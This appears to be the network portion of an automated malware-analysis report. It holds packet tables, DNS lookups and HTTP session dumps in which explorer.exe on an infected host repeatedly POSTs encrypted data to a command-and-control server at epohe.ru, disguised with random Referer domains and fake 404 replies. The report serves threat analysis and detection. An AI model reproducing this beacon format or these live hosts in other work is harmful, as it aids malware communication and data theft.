                                                  Sep 2, 2024 08:21:15.844005108 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.844013929 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.844018936 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.844043970 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.844048977 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.844057083 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.844063044 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.844100952 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.844161034 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.844216108 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.844234943 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.844278097 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.844285965 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.844291925 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.844321012 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.844335079 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.844690084 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.924683094 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.924729109 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.924766064 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.924798012 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.924806118 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.924823999 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.924860001 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.924892902 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.924906015 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.924949884 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.924957991 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.924963951 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.924988031 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.924992085 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925005913 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925012112 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925041914 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925117970 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925163031 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925169945 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925204039 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925229073 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925268888 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925276041 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925282001 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925303936 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925309896 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925327063 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925331116 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925343990 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925353050 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925384045 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925388098 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925422907 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925509930 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925549984 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925553083 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925560951 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925601006 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925621033 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925622940 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925633907 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925658941 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925683975 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925734997 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925744057 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925782919 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925822020 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925858021 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925872087 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925877094 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.925895929 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.925915956 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.926069021 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.926109076 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.926150084 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.926152945 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.926208019 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.926448107 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.926502943 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.926675081 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.926712990 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.926723957 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.926729918 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.926748991 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.926753998 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.926789045 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.926811934 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.926817894 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.926827908 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.926836967 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.926867008 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.926872969 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.926918983 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.926954985 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.926986933 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.927009106 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.927015066 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.927031040 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.927052975 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.927062035 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.927067041 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.927094936 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.927103996 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.927110910 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.927138090 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.927155972 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.927189112 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.927242994 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.927246094 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.927256107 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:15.927299976 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:15.927449942 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:16.007977009 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:16.008016109 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:16.008064032 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:16.008076906 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:16.008105040 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:16.008105040 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:16.008126974 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:16.008155107 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:16.009438038 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:16.009454012 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:16.009483099 CEST49744443192.168.2.684.32.84.152
                                                  Sep 2, 2024 08:21:16.009489059 CEST4434974484.32.84.152192.168.2.6
                                                  Sep 2, 2024 08:21:16.178534031 CEST4974580192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:16.183584929 CEST80497452.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:16.183667898 CEST4974580192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:16.183809042 CEST4974580192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:16.183840036 CEST4974580192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:16.188698053 CEST80497452.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:16.188709974 CEST80497452.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:17.770119905 CEST80497452.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:17.770139933 CEST80497452.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:17.770363092 CEST4974580192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:17.770584106 CEST4974580192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:17.773147106 CEST4974680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:17.775669098 CEST80497452.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:17.778429031 CEST80497462.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:17.778512001 CEST4974680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:17.778636932 CEST4974680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:17.778650999 CEST4974680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:17.783440113 CEST80497462.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:17.783449888 CEST80497462.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:18.914629936 CEST80497462.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:18.914645910 CEST80497462.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:18.914730072 CEST4974680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:18.915013075 CEST4974680192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:18.919799089 CEST80497462.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:18.935209990 CEST4974780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:18.942682981 CEST80497472.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:18.942918062 CEST4974780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:18.942918062 CEST4974780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:18.942945004 CEST4974780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:18.951716900 CEST80497472.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:18.951725006 CEST80497472.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:20.102070093 CEST80497472.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:20.102097034 CEST80497472.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:20.102227926 CEST4974780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:20.102350950 CEST4974780192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:20.104708910 CEST4974880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:20.107297897 CEST80497472.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:20.109797001 CEST80497482.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:20.109863997 CEST4974880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:20.109977961 CEST4974880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:20.109996080 CEST4974880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:20.114828110 CEST80497482.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:20.114839077 CEST80497482.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:22.026204109 CEST80497482.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:22.026231050 CEST80497482.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:22.026241064 CEST80497482.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:22.026288033 CEST4974880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:22.026324987 CEST4974880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:22.030730963 CEST4974880192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:22.035983086 CEST80497482.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:22.313646078 CEST4975080192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:22.319367886 CEST80497502.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:22.319449902 CEST4975080192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:22.319582939 CEST4975080192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:22.319618940 CEST4975080192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:22.325298071 CEST80497502.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:22.325571060 CEST80497502.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:22.459410906 CEST4975180192.168.2.691.202.233.158
                                                  Sep 2, 2024 08:21:22.464790106 CEST804975191.202.233.158192.168.2.6
                                                  Sep 2, 2024 08:21:22.464953899 CEST4975180192.168.2.691.202.233.158
                                                  Sep 2, 2024 08:21:22.465679884 CEST4975180192.168.2.691.202.233.158
                                                  Sep 2, 2024 08:21:22.470649958 CEST804975191.202.233.158192.168.2.6
                                                  Sep 2, 2024 08:21:23.130409002 CEST804975191.202.233.158192.168.2.6
                                                  Sep 2, 2024 08:21:23.130470991 CEST4975180192.168.2.691.202.233.158
                                                  Sep 2, 2024 08:21:23.134284973 CEST4975180192.168.2.691.202.233.158
                                                  Sep 2, 2024 08:21:23.139251947 CEST804975191.202.233.158192.168.2.6
                                                  Sep 2, 2024 08:21:23.383081913 CEST804975191.202.233.158192.168.2.6
                                                  Sep 2, 2024 08:21:23.383253098 CEST4975180192.168.2.691.202.233.158
                                                  Sep 2, 2024 08:21:23.479399920 CEST80497502.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:23.479420900 CEST80497502.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:23.479496002 CEST4975080192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:23.479722977 CEST4975080192.168.2.62.185.214.11
                                                  Sep 2, 2024 08:21:23.484616041 CEST80497502.185.214.11192.168.2.6
                                                  Sep 2, 2024 08:21:25.146641016 CEST4975180192.168.2.691.202.233.158
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Sep 2, 2024 08:20:36.879251957 CEST5276853192.168.2.61.1.1.1
                                                  Sep 2, 2024 08:20:37.059901953 CEST53527681.1.1.1192.168.2.6
                                                  Sep 2, 2024 08:21:12.691606998 CEST5094953192.168.2.61.1.1.1
                                                  Sep 2, 2024 08:21:12.775898933 CEST53509491.1.1.1192.168.2.6
                                                  Sep 2, 2024 08:21:54.983066082 CEST5615653192.168.2.61.1.1.1
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Sep 2, 2024 08:20:36.879251957 CEST192.168.2.61.1.1.10xe624Standard query (0)epohe.ruA (IP address)IN (0x0001)false
                                                  Sep 2, 2024 08:21:12.691606998 CEST192.168.2.61.1.1.10x264Standard query (0)www.darkviolet-alpaca-923878.hostingersite.comA (IP address)IN (0x0001)false
                                                  Sep 2, 2024 08:21:54.983066082 CEST192.168.2.61.1.1.10xe7dbStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Sep 2, 2024 08:20:37.059901953 CEST1.1.1.1192.168.2.60xe624No error (0)epohe.ru2.185.214.11A (IP address)IN (0x0001)false
                                                  Sep 2, 2024 08:20:37.059901953 CEST1.1.1.1192.168.2.60xe624No error (0)epohe.ru154.144.253.197A (IP address)IN (0x0001)false
                                                  Sep 2, 2024 08:20:37.059901953 CEST1.1.1.1192.168.2.60xe624No error (0)epohe.ru190.218.32.149A (IP address)IN (0x0001)false
                                                  Sep 2, 2024 08:20:37.059901953 CEST1.1.1.1192.168.2.60xe624No error (0)epohe.ru105.155.13.153A (IP address)IN (0x0001)false
                                                  Sep 2, 2024 08:20:37.059901953 CEST1.1.1.1192.168.2.60xe624No error (0)epohe.ru211.181.24.133A (IP address)IN (0x0001)false
                                                  Sep 2, 2024 08:20:37.059901953 CEST1.1.1.1192.168.2.60xe624No error (0)epohe.ru190.249.193.233A (IP address)IN (0x0001)false
                                                  Sep 2, 2024 08:20:37.059901953 CEST1.1.1.1192.168.2.60xe624No error (0)epohe.ru186.123.165.48A (IP address)IN (0x0001)false
                                                  Sep 2, 2024 08:20:37.059901953 CEST1.1.1.1192.168.2.60xe624No error (0)epohe.ru191.191.224.16A (IP address)IN (0x0001)false
                                                  Sep 2, 2024 08:20:37.059901953 CEST1.1.1.1192.168.2.60xe624No error (0)epohe.ru190.159.30.35A (IP address)IN (0x0001)false
                                                  Sep 2, 2024 08:20:37.059901953 CEST1.1.1.1192.168.2.60xe624No error (0)epohe.ru187.156.95.126A (IP address)IN (0x0001)false
                                                  Sep 2, 2024 08:21:12.775898933 CEST1.1.1.1192.168.2.60x264No error (0)www.darkviolet-alpaca-923878.hostingersite.comfree.cdn.hstgr.netCNAME (Canonical name)IN (0x0001)false
                                                  Sep 2, 2024 08:21:12.775898933 CEST1.1.1.1192.168.2.60x264No error (0)free.cdn.hstgr.net84.32.84.152A (IP address)IN (0x0001)false
                                                  Sep 2, 2024 08:21:54.991416931 CEST1.1.1.1192.168.2.60xe7dbNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                  • www.darkviolet-alpaca-923878.hostingersite.com
                                                  • fwivmymbxwb.com
                                                    • epohe.ru
                                                  • bvrcwhkhepnussxw.com
                                                  • bfuqgtbxdbrm.com
                                                  • nysunlaoxsnx.net
                                                  • mngbwwbxxtu.org
                                                  • mtxcnwqijndc.com
                                                  • lbbemhvyacupfj.com
                                                  • pnkjbaopqllltj.com
                                                  • xabepmucutwrclm.org
                                                  • ciagjuvshwyap.com
                                                  • dlseqphhdlmhj.com
                                                  • oydqaptimmqlwlr.com
                                                  • ubqxonkbwrw.org
                                                  • llwvqfhgyhhpg.com
                                                  • yinxmrewdxvvup.com
                                                  • iyfnrlbdswaun.org
                                                  • glhjgpfospwhdw.net
                                                  • gcybmsqpemm.net
                                                  • ltleqvppjdrlod.com
                                                  • atmipbdihgavjw.net
                                                  • lefbfksalyjs.com
                                                  • wiitjtnnnvend.net
                                                  • rkfklwpuiufh.org
                                                  • xqysrgfmfacgd.com
                                                  • bjsidbjqhyjuh.net
                                                  • rbkqrcgmoxbnb.com
                                                  • ytcopihlywgad.org
                                                  • ylpbksvjwmy.net
                                                  • lumgcfdgtsy.org
                                                  • nlfvvperahgbd.net
                                                  • 91.202.233.158
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.6497162.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:20:37.086312056 CEST268OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://fwivmymbxwb.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 214
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:20:37.086338043 CEST214OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 63 28 b5 98
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA .[k,vuc(f]b{lD17$ce2w>g SW)3QVvOboDCKOM'-x)l?0UH
                                                  Sep 2, 2024 08:20:38.264113903 CEST152INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:20:38 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 04 00 00 00 72 e8 86 e4
                                                  Data Ascii: r


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.6497172.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:20:38.282176971 CEST273OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://bvrcwhkhepnussxw.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 318
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:20:38.282198906 CEST318OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 5c 52 c9 9e
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu\R_mkI[?ZT.o-t 4_wJQB;=T;gF?[YJF@bGJ!D3UzpOQ~CcOv
                                                  Sep 2, 2024 08:20:39.421020985 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:20:39 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.6497182.185.214.11804004C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 2, 2024 08:20:39.432214975 CEST269OUTPOST /tmp/ HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://bfuqgtbxdbrm.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 362
                                                  Host: epohe.ru
                                                  Sep 2, 2024 08:20:39.432240963 CEST362OUTData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 34 0a a5 bb
                                                  Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu4OVr|#L3 kR<m~-*//yDO{v@.4dR%mrFk?Q@.lDPK;o"<U2
                                                  Sep 2, 2024 08:20:40.546471119 CEST475INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.26.0
                                                  Date: Mon, 02 Sep 2024 06:20:40 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Connection: close
